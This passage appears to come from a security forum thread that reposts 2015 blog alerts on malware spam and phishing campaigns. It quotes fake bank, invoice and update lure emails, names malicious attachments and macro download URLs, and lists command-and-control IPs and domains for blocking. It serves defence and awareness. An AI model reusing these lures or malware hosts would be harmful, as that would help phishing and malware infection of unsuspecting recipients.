The ZIP file contains a malicious executable SetupIRS2015.exe which has a VirusTotal detection rate of 8/53*. The irsuk .co site is hosted on 89.108.88.9 (Agava Ltd, Russia). The Malwr report shows it phoning home to garbux .com (78.24.219.6 - TheFirst-RU, Russia)... A look at 89.108.88.9 shows there is only one active website on that IP address (irsuk .co), but the host on the IP identifies itself as ukirsgov .com which is a domain created on the same day (2015-01-19) but has been -suspended- due to invalid WHOIS details (somebody at csc .com), which was hosted on a Bosnian IP of 109.105.193.99 (Team Consulting d.o.o.).That IP is identified as malicious by VirusTotal with a number of bad domains and binaries**. The malware POSTS to garbux .com which Sophos identifies as a characteristic of the generically-named Troj/Agent-ALHF. Overall, automated analysis tools are not very clear about what this malware does... although you can guarantee it is nothing good.
Recommended blocklist:
89.108.88.9
78.24.219.6
109.105.193.99
irsuk .co
garbux .com
ukirsgov .com
updateimage .ru
getimgdcenter .ru
agensiaentrate .it
freeimagehost .ru "
* https://www.virustotal.com/en/file/8dd29cf89a00689ce7221f8b4ab7873784c91555773ad90e509bdf90a68c019d/analysis/1422014166/
** 109.105.193.99: https://www.virustotal.com/en/ip-address/109.105.193.99/information/
___
Fake AMEX SPAM - PDF malware
- http://myonlinesecurity.co.uk/american-express-message-ready-fake-pdf-malware/
23 Jan 2015 - "'Your Message is Ready' pretending to come from American Express <secure.message@ americanexpresss .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and download the malware zip...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Amex-your-message-is-ready.png
When you follow the link you get a page saying "Get file. Your download will start in 5 seconds..." ... which then counts down to zero. You might get the -malware- automatically downloaded or you might have to click-the-direct-link [don't].
23 January 2015: bankline_document_pdf57331.zip (12 kb): Extracts to: bankline_document_pdf34929.exe
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/62a3f1d161c9a52c6283b2e426a1289b160f943b32f337877843bc37100564cc/analysis/1422025963/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
192.163.217.66: https://www.virustotal.com/en/ip-address/192.163.217.66/information/
___
Fake 'BankLine secure message' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-you-have-received-new.html
23 Jan 2015 - "... these RBS BankLine spam messages are a popular mechanism for the bad guys to spread malware.
From: Bankline [secure.message@ rbs .com .uk]
Date: 23 January 2015 at 12:43
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow:
<redacted>
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly...
The link in the email seems to be somewhat dynamic... The landing page looks like this:
> http://4.bp.blogspot.com/-LLqihSXhTvU/VMJVxFvr-PI/AAAAAAAAGKw/rEq-NZnPuJo/s1600/fake-rbs.jpg
The link on that landing page goes to http ://animation-1 .com/js/jquery-1.41.15.js?get_message which downloads a ZIP file called Bankline_document_pdf71274.zip (or something similar) containing an executable file named something like Bankline_document_pdf24372.exe. The numbers change in each case, and indeed the executable changes slightly every time it is downloaded. The ThreatExpert report shows that it attempt to communicate with the well-known-bad-IP of 202.153.35.133 (Excell Media Pvt Ltd, India) which is associated with the Dyre banking trojan."
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
:fear: :mad:
AplusWebMaster
2015-01-26, 16:49
FYI...
Fake 'HP Scanned Image' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-hp-digital-device-scanned.html
26 Jan 2015 - "This spam comes with a malicious attachment:
From: HP Digital Device [HP_Printer@ victimdomain .com]
Date: 26 January 2015 at 13:04
Subject: Scanned Image
Please open the attached document.
This document was digitally sent to you using an HP Digital Sending device...
This email has been scanned for viruses and spam...
Attached is a file ScannedImage.zip which contains a malicious executable ScannedImage.scr which has a VirusTotal detection rate of 5/56*..."
* https://www.virustotal.com/en/file/022106d84bc29aa99d5730d5be1dfcd4d03e28ebd9f6a8965c7efab258494cbd/analysis/1422279206/
- http://myonlinesecurity.co.uk/scanned-image-fake-pdf-malware/
26 Jan 2015
> https://www.virustotal.com/en/file/022106d84bc29aa99d5730d5be1dfcd4d03e28ebd9f6a8965c7efab258494cbd/analysis/1422279206/
___
Fake 'Berendsen Invoice" SPAM – doc malware
- http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60020918-117-word-doc-malware/
26 Jan 2015 - "'Berendsen UK Ltd Invoice 60020918 117' pretending to come from donotreply@berendsen.co.uk with -a malicious word doc attachment- is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Sir/Madam, Please find attached your invoice dated 1st January. All queries should be directed to your branch that provides the service. This detail can be found on your invoice. Thank you...
26 January 2015: IRN001526_60020918_I_01_01.DOC (39 kb)
Current Virus total detections: 0/55* | IRN001526_60020918_I_01_01.DOC (34kb) 0/56**
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/17b2a838cf97a51a957b4fdac872da5275099eafe51d9ef36e4ccd0807863cd6/analysis/1422258625/
** https://www.virustotal.com/en/file/0425efe9926a2224ab2116142b769e924252320194a347f52d0800c6005caeec/analysis/1422258320/
- http://blog.dynamoo.com/2015/01/malware-spam-berendsen-uk-ltd-invoice.html
26 Jan 2015
> https://www.virustotal.com/en/file/f0b5ff9d89abfff25e71cc6b917d3c91d72a118d2b31174564b6e026da6b9846/analysis/1422262884/
- http://blog.mxlab.eu/2015/01/26/email-berendsen-uk-ltd-invoice-60020918-117-contains-malicious-word-attachment/
Jan 26, 2015
> https://www.virustotal.com/en/file/f0b5ff9d89abfff25e71cc6b917d3c91d72a118d2b31174564b6e026da6b9846/analysis/1422262884/
___
Fake 'CardsOnLine natwesti' SPAM
- http://blog.dynamoo.com/2015/01/malware-spam-cardsonlinenatwesticom.html
26 Jan 2015 - "This -fake- NatWest email leads to malware:
From: CardsOnLine [CardsOnLine@ natwesti .com]
Date: 26 January 2015 at 13:06
Subject: Cards OnLine E-Statement E-Mail Notification
Body:
Dear Customer
Your July 30, 2014 E-Statement for account number xxxxxxxxxxxx6956 from Cards OnLine is now available.
For more information please check link: <redacted>
Thank you
Cards OnLine
... Users have recently been targeted through -bogus- E-Mails by fraudsters claiming to be from their bank. These E-Mails ask customers to provide their internet banking security details in order to reactivate their account or verify an E-Mail address. Please be on your guard against E-Mails that request any of your security details... Users who click-the-link see a download page similar to this:
> https://4.bp.blogspot.com/-a7BgUdoOpJM/VMZTVvYZRHI/AAAAAAAAGLE/f3cZqKKwrpA/s1600/natwest-download.png
The link in the email downloads a randomly-named file in the format security_notice55838.zip which contains a malicious binary which will have a name similar to security_notice18074.exe. This binary has a VirusTotal detection rate of 1/56* and is identified by Norman AV as Upatre..."
* https://www.virustotal.com/en/file/87c96a40af60b3f4d99bf6c2c261a4cdcfce6c46b682c49acce4ca424190aa2c/analysis/1422281915/
___
Fake 'Sage Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/sage-re-invoice-9836956-fake-pdf-malware/
26 Jan 2015 - "'RE: Invoice #9836956' pretending to come from Sage .co .uk <no-reply@ sage .co .uk>
[random invoice numbers] with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please remit BACs before 26/01/2015. The document attached.
The malware attached to this email is exactly the same as in today’s Scanned Image – fake PDF malware*.
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/scanned-image-fake-pdf-malware/
:fear: :mad:
AplusWebMaster
2015-01-27, 17:38
FYI...
Whatsapp leads to Fake Flash update – malware
- http://myonlinesecurity.co.uk/whatsapp-notification-leading-fake-flashplayer-update-malware/
27 Jan 2015 - "An email pretending to come from somebody you know that appears to be a Whatsapp notification is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/whatsapp_flash_update1-262x300.png
When you press the play button in the email, you get sent to a page looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/whatsapp_flash_update2-1024x739.png
... if you select the 'upgrade now' button you end up with a fake flash player update and a badly infected computer...
27 January 2015: adobe_flash_player_update.exe . Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/78ddffc79c02331fd229c563e0a442bb018716f6d86bbf96c41518daa64a2ac6/analysis/1422376705/
___
Fake 'invoice' SPAM - malware
- http://blog.dynamoo.com/2015/01/malware-spam-eileen-meade-r-kern.html
27 Jan 2015 - "Kern Engineering & Mfg Corp. is a wholly legitimate firm, they are not sending out this spam nor have their systems been compromised in any way. Instead, this is a -forgery- which has a malicious Word document attached.
From: Eileen Meade [eileenmeade@ kerneng .com]
date: 27 January 2015 at 08:25
subject: inv.# 35261
Here is your invoice & Credit Card Receipt.
Eileen Meade
R. Kern Engineering & Mfg Corp.
Accounting
909) 664-2442
Fax 909) 664-2116
So far, I have seen two different version of the Word document, both poorly detected [1] [2] containing two different macros... These attempt to download a binary from one of the following locations:
http ://UKR-TECHTRAININGDOMAIN .COM/js/bin.exe
http ://schreinerei-ismer.homepage.t-online .de/js/bin.exe
This is saved as %TEMP%\sdfsdferfwe.exe. It has a VirusTotal detection rate of 3/57*..."
1] https://www.virustotal.com/en/file/7eee6bc6e3f310ffac3dc043b6d17ae7b0001693737a0fe1fc124eeb7695622d/analysis/1422351101/
2] https://www.virustotal.com/en/file/2ee6e22de91581fe5dd93407be7207f746c3c6ae52264065c3a344d61e4d0f2d/analysis/1422351116/
* https://www.virustotal.com/en/file/23bbf7b1407bb9e657160f0545facc1d2634d5ba55d67bfaef3685194aa66ec1/analysis/1422351532/
- http://myonlinesecurity.co.uk/eileen-meade-kern-engineering-inv-87049-word-doc-malware/
27 Jan 2015
> https://www.virustotal.com/en/file/7eee6bc6e3f310ffac3dc043b6d17ae7b0001693737a0fe1fc124eeb7695622d/analysis/1422350612/
> https://www.virustotal.com/en/file/2ee6e22de91581fe5dd93407be7207f746c3c6ae52264065c3a344d61e4d0f2d/analysis/1422350713/
- http://blog.mxlab.eu/2015/01/27/fake-email-from-r-kern-engineering-inv-57949-contains-malicious-word-document/
Jan 27, 2015
> https://www.virustotal.com/en/file/23bbf7b1407bb9e657160f0545facc1d2634d5ba55d67bfaef3685194aa66ec1/analysis/1422351532/
216.251.43.17: https://www.virustotal.com/en/ip-address/216.251.43.17/information/
80.150.6.138: https://www.virustotal.com/en/ip-address/80.150.6.138/information/
:fear: :mad:
AplusWebMaster
2015-01-28, 14:24
FYI...
Fake 'invoice' SPAM - doc malware
- http://myonlinesecurity.co.uk/windsor-flowers-invoice-1385-word-doc-malware/
28 Jan 2015 - "'Windsor Flowers Invoice 1385' pretending to come from Windsor Flowers Accounts <windsorflowersaccounts@ hotmail .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has what appears to be a genuine word doc attached which is malformed and contains a macro script virus... The email looks like:
Dear Accounts payable
Please see attached invoice 1385 for flowers within January 15.
Our bank details can be found at the bottom of the invoice.
If paying via transfer please reference our invoice number.
If you have any queries, please do not hesitate to contact me.
Many thanks in advance
Connie
Windsor Flowers
74 Leadenhall Market
London
EC3 V1LT
Tel: 020 7606 4277...
28 January 23015: Windsor Flowers Invoice 1385 Sheet1.doc (2 different versions)
Current Virus total detections: (76kb) 3/57* | (84 kb) 3/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/29e3cf6745741414e3249c10a60f146a0f7dc8776b77fb1c18a8cd71233bdfcf/analysis/1422442083/
** https://www.virustotal.com/en/file/0dc4f465af070ed0e15c1ab5932956fa8542688bb4e0de37b6efdc32b63cf8b1/analysis/1422443094/
___
Fake 'RBS' SPAM - pdf-malware
- http://myonlinesecurity.co.uk/rbs-morning-commentary-fake-pdf-malware-2/
28 Jan 2015 - "'RBS Morning commentary' pretending to come from RBS .COM <no-replay@ rbs .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please refer to the details below if you are having problems reading the attached file.
Please do not contact your Treasury Centre for technical issues – these should be routed to RBS FM support.The attached file is in zip format; first you have to unzip it (self-extracting archive, Adobe PDF) and then it can be viewed in Adobe Acrobat Reader 3.0 or above. If you do not have a copy of the software please contact your technical support department...
All the attachment numbers are random but all extract to same -malware- payload.
28 January 2015: attachment3532715.zip: Extracts to: attachment.exe
Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fdb5ee90aacbac3fcde716adfc837f96d0f12f85d9a5ffd9f60eea6f66376b00/analysis/1422448752/
... Behavioural information
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
xHamster involved in large Malvertising campaign ...
- https://blog.malwarebytes.org/exploits-2/2015/01/top-adult-site-xhamster-involved-in-large-malvertising-campaign/
Jan 27, 2015 - "... a particular large malvertising campaign in progress from popular adult site xhamster[.]com, a site that boasts half a billion visits a month. In the past two days we have noted a 1500% increase in infections starting from xHamster. Contrary to the majority of drive-by download attacks which use an exploit kit, this one is very simple and yet effective by embedding landing page and exploit within a rogue ad network... The URL linked to is a simplified landing page hosted by what looks like a rogue ad network. The landing simply consists of preparing for a Flash Player exploit... the Flash exploit itself (0 detection on VT*), again hosted on the same ad network. Depending on your version of Flash you may get the recent 0-day:
> https://blog.malwarebytes.org/wp-content/uploads/2015/01/flash-300x262.png
Upon successful exploitation, a malicious payload (Bedep) VT 2/57**, is downloaded from:
hxxp ://nertafopadertam .com/2/showthread.php
What we see post exploitation is ad fraud as described here***... While malvertising on xHamster is nothing new, this particular campaign is extremely active. Given that this adult site generates a lot of traffic, the number of infections is going to be huge."
* https://www.virustotal.com/en/file/b0cb277928be3a1072d6c05c7ab6386f2e0c836d51f71cfefeae8f061bdf1ee8/analysis/1422391909/
** https://www.virustotal.com/en/file/00ce05a515ac0c081636712979b6c04b02b3089cc3e3a2af2554a6ff62330f85/analysis/1422393597/
*** https://blog.malwarebytes.org/exploits-2/2015/01/new-adobe-flash-zero-day-found-in-the-wild/
:fear: :mad:
AplusWebMaster
2015-01-29, 15:56
FYI...
Fake 'Invoice' SPAM - doc malware
- http://myonlinesecurity.co.uk/invoice-10413-spotless-cleaning-word-doc-malware/
29 Jan 2015 - "'Invoice #10413 from SPOTLESS CLEANING pretending to come from paulamatos@ btinternet .com with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This message contains Invoice #10413 from SPOTLESS CLEANING. If you have questions about the contents of this message or Invoice, please contact SPOTLESS CLEANING.
SPOTLESS CLEANING
GLYNDEL HOUSE
BOWER LANE
DA4 0AJ
07956 379907
29 January 2015 : SPOTLESS CLEANING-Invoice-10413.doc - Current Virus total detections: 0/57*
... this malicious word doc with macros downloads from www .otmoorelectrical .co.uk/js/bin.exe which is saved as %temp%\hDnyDA.exe (dridex banking Trojan) which has a current detection rate of 2/57** ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f1b3df8dde1b7336810c70898546b76afe5b2ba4af247ce33f6296ca06db45e0/analysis/1422523082/
** https://www.virustotal.com/en/file/6f738e8f6cd3a6abba6168a0046288690f4ee6aa778fbe202a3eac458168ceea/analysis/1422531540/
___
Fake 'BACS Transfer' SPAM - doc malware
- http://myonlinesecurity.co.uk/garth-hutchison-bacs-transfer-remittance-jsag400gbp-word-doc-malware/
29 Jan 2015 - "'Garth Hutchison BACS Transfer : Remittance for JSAG400GBP' pretending to come from Garth Hutchison <accmng2556@ blumenthal .com> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
29 January 2015 : BACS_transfer_JS87123781237.doc - Current Virus total detections: 0/57*
... same malware payload as today’s Invoice #10413 from SPOTLESS CLEANING – Word doc malware** ..."
* https://www.virustotal.com/en/file/f1b3df8dde1b7336810c70898546b76afe5b2ba4af247ce33f6296ca06db45e0/analysis/1422524523/
** http://myonlinesecurity.co.uk/invoice-10413-spotless-cleaning-word-doc-malware/
___
Swiss users inundated with malware-laden SPAM
- http://net-security.org/malware_news.php?id=2950
29.01.2015 - "Swiss users are being heavily targeted by a number of spam campaigns delivering the Tiny Banker (TinBa or Busy) e-banking Trojan. Starting with Tuesday, the spammy emails seem to come from email addresses opened with big Swiss free email service providers (bluewin .ch, gmx .ch) and Swiss telecom provider Orange (orange .ch), but actually originate from broadband lines located all over the world. They masquerade as emails containing images sent from iPhones, an MMS sent to the user by Orange, and an application for a job position:
> http://www.net-security.org/images/articles/swiss-spam-29012015.jpg
Unfortunately for those who fall for these tricks, the attached ZIP files contain only malware. "While most of the Tinba versions I usually come across of are utilising a Domain Generation Algorithm (DGA) to calculate the current botnet C&C domain, the version of Tinba that has been spread in Switzerland since yesterday is using hard-coded botnet C&C domains," noted Swiss security activist Raymond Hussy*. Further investigation revealed that all the sending IP addresses are Cutwail infected IPs, and the malware tries to contact four distinct C&C servers, two of which have already been sinkholed. Hussy recommends to network administrators to block traffic to and from the remaining two active domains (serfanteg .ru, midnightadvantage .ru) and the following IPs: 91.220.131.216 and 91.220.131.61. "In general, 91.220.131.0/24 looks quite suspect. So you may want to block the whole netblock," he pointed out, adding that it would also be a good idea to block filenames with multiple file extentions on their email gateway."
* https://www.abuse.ch/?p=9095
91.220.131.61: https://www.virustotal.com/en/ip-address/91.220.131.61/information/
91.220.131.216: https://www.virustotal.com/en/ip-address/91.220.131.216/information/
:fear: :mad:
AplusWebMaster
2015-01-30, 14:59
FYI...
Fake 'BACS Transfer' SPAM - doc malware
- http://blog.dynamoo.com/2015/01/malware-spam-bacs-transfer-remittance.html
30 Jan 2015 - "So far I have only seen one sample of this..
From "Garth Hutchison"
Date 21/01/2015 11:50
Subject BACS Transfer : Remittance for JSAG400GBP
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
Attached is a malicious Word document BACS_transfer_JS87123781237.doc [VT 1/57*] which contains a macro... which downloads a file from:
http ://stylishseychelles .com/js/bin.exe
This is then saved as %TEMP%\iHGdsf.exe. This has a VirusTotal detection rate of 6/57** identifying it as a Dridex download... Sources indicate that this malware phones home to the following IPs which I recommend you block:
92.63.88.108
143.107.17.183
5.39.99.18
136.243.237.218 "
* https://www.virustotal.com/en/file/901652283bd26716f3d5d2d6f4d032e0d942302877c51529e101a5a53c631de7/analysis/1422618493/
** https://www.virustotal.com/en/file/32b8d7069dae180e0f2666301384411243256d9abc681f897eb67bf0fd6e6406/analysis/1422618468/
___
Fake BBB SPAM - PDF malware
- http://myonlinesecurity.co.uk/bbb-sbq-form-2508ref61-959-0-4-fake-pdf-malware/
30 Jan 2015 - "'BBB SBQ Form #2508(Ref#61-959-0-4)' pretending to come from Admin <no-replay@ bbbl .org> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/BBB.png
30 January 2015: SBQForm-57675.zip ( 13kb) : Extracts to: doc-PDF.exe
Current Virus total detections: 8/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/027d6621ed2c127a311006f17edeacabaf6dd2abefa3d1078e6e140403192a1f/analysis/1422628270/
... Behavioural information
TCP connections
46.165.223.77: https://www.virustotal.com/en/ip-address/46.165.223.77/information/
31.170.162.203: https://www.virustotal.com/en/ip-address/31.170.162.203/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
208.91.197.54: https://www.virustotal.com/en/ip-address/208.91.197.54/information/
208.97.25.20: https://www.virustotal.com/en/ip-address/208.97.25.20/information/
___
Fake 'RE-CONFIRM' SPAM - malware
- http://myonlinesecurity.co.uk/re-confirm-p-oxx1ll112-malware/
30 Jan 2015 - "'RE-CONFIRM P.O©{XX1ll112}' pretending to come from sensaire@ emirates .net .ae with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/RE-CONFIRM-P.O%C2%A9XX1ll112.png
30 January 2015: Purchase order(1).zip: Extracts to: Purchase order.exe
Current Virus total detections: 12/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper file with an icon saying A instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8e60c22f0f013b03db8f65d29b2321f74bdf9300fbadcbf3f730556ad95c6255/analysis/1422633004/
___
Fake 'Apple Termination' – Phish ...
- http://myonlinesecurity.co.uk/apple-termination-phishing/
30 Jan 2015 - "'Apple Termination' pretending to come from Apple Account <support@ apple-messages .com> is one of the latest -phish- attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/Apple-Termination.png
If you follow the link you see a webpage looking like with a pre-filled in box with your email address in it:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID.png
When you fill in your user name and password you get a page looking like this ( split into sections), where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID_3.png
... these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___
Fake 'Tesco Bank' – Phish ...
- http://myonlinesecurity.co.uk/latest-estatement-ready-tesco-bank-phishing/
30 Jan 2015 - "'Latest estatement is ready – Tesco Bank' pretending to come from savings@ tescobank .com <pol@ tesco .com> is one of the latest -phish- attempts to steal your Tesco bank Account and your other personal details. This one only wants your personal details, Tesco log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... a website that looks at first glance like the genuine Tesco bank website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email.
Certain restriction has been placed on your tesco bank online services
View your eDocument attached to proceed
Tesco Bank is a retail bank in the United Kingdom which was formed in 1997,
and which has been wholly owned by Tesco PLC since 2008
©Tesco Personal Finance plc 2014 / ©Tesco Personal Finance Compare Limited 2014.
If you open the attached html form you see this message:
Your Latest Tesco Bank Saving Account Statement is ready.
Certain restriction has been placed on your tesco bank online service
You would be required to re – activate your online banking access to proceed
Activate Your Online Access
If you follow that link you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers1.jpg
Then you get a page asking for password and Security number:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers2.jpg
After you fill in your Security number and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers3.jpg
Then they send you to this page and eventually it auto redirects you to the genuine Tesco bank site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/tesco_vouchers4.jpg
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
:fear::fear: :mad:
AplusWebMaster
2015-01-31, 19:51
FYI...
Super Bowl Phishing -and- SPAM ...
- https://isc.sans.edu/diary.html?storyid=19261
2015-01-31 - "Beware of Super Bowl spam that may come to your email inbox this weekend. The big game is Sunday and the spam and phishing emails are -pouring- in complete with helpful -links- back-ended by malware and/or credential harvesting:
> https://isc.sans.edu/diaryimages/images/superbowl.PNG
... worth a reminder to friends and family if they see any emails about the Super Bowl that appears to be too-good-to-be-true - delete it..."
:fear::fear:
AplusWebMaster
2015-02-02, 19:30
FYI...
Fake 'Facebook Account' SPAM - PDF malware
- http://myonlinesecurity.co.uk/facebook-account-suspended-fake-pdf-malware/
2 Feb 2015 - "'Facebook Account Suspended' pretending to come from Facebook <noreply@ mail .fb .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and follow the link and run the downloaded file... Google seems to be -ignoring- the report to take down this url so far today or are far too busy complaining about Microsoft and other program makers not issuing patches inside the 90 day time period that Google insist on, to do something really useful in actually protecting users from malware like this one... The email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/facebook-account-suspended.png
2 February 2015 : TermsPolicies.pdf.exe - Current Virus total detections: 11/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9af89f66fb76b016dcf0ab984c35b3948f0f04e828509c083637a8498d3e81dc/analysis/1422881129/
___
Fake 'Your Apple ID' - Phish ...
- http://myonlinesecurity.co.uk/apple-idwas-used-restore-device-one-icloud-backups-phishing/
2 Feb 2015 - "'Your Apple ID,was used to restore a device from one of your iCloud backups' pretending to come from Apple iTunes <orders@ tunes .co .uk> is one of the latest phish attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... The original email looks like this It will NEVER be a genuine email from Apple or any other company so don’t ever click-the-link in the email. If you do it will lead you to a website that looks at first glance like the genuine Apple website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you fill in the html (webpage) form that comes attached to the email. This one has a short url link ( https ://tr .im/JxUNR) in the email which -redirects- you... When you fill in your user name and password you get a page looking very similar to this one ( split into sections), where the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
(Screenshots available at the myonlinesecurity URL at the top of this post.)
___
Facebook porn video trojan affects 110K users in 2 days
- http://www.theinquirer.net/inquirer/news/2393198/facebook-porn-video-trojan-affects-110-000-users-in-two-days
Feb 02 2015 - "A TROJAN that has spread itself by posting links to a pornographic video has affected over 110,000 Facebook users in just 48 hours. The malware spreads from the account of previously infected users of the social network, tagging around 20 of their friends. If someone opens the link contained in the post, they will get a preview of a porn video which eventually stops and asks for a fake Flash player to be downloaded which contains the malware. The malware was uncovered by a security researcher called Mohammad Reza Faghan, who posted information about it on security mailing list archive Seclists.org*... the Trojan is different from previous examples seen on Facebook, which sent messages on behalf of the victim to a number of the victim's friends. Upon infection of those friends, the malware could go one step further and infect the friends of the initial friends. In the new technique, however, the malware has more visibility to the potential victims as it tags the friends of the victim in the malicious post. The malware is thought to be able to hijack keyboard and mouse movements if executed successfully once landing on a victim's machine."
* http://seclists.org/fulldisclosure/2015/Jan/131
___
Fake Chrome update Spam drops CTB Locker/Critroni Ransomware
- https://blog.malwarebytes.org/social-engineering/2015/02/google-chrome-update-spam-drops-ctb-lockercritroni-ransomware/
Feb 2, 2015 - "Beware of emails appearing to come from Google warning you that “Your version of Google Chrome is potentially vulnerable and out of date”. In this latest spam wave, cyber crooks are tricking users into downloading the well-known browser, except that it’s a dangerous Trojan that will encrypt your personal files and demand a hefty ransom to decrypt them back:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/spam.png
The payload is not attached to the email but instead gets downloaded from various websites that appear to have been compromised... Running “ChromeSetup.exe” will not install Google Chrome. Instead the Windows wallpaper will change to this:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted1.png
This is not just a fake warning. The files on the systems are -indeed- encrypted:
